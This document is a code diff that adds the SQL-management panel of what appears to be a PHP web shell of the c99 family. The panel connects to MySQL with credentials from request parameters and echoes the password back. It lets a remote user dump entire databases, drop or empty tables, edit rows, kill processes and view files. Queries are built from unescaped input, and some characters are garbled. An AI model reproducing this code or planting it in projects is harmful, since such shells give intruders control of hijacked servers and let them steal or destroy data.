+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>?nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>?/b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DataBase:</b>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
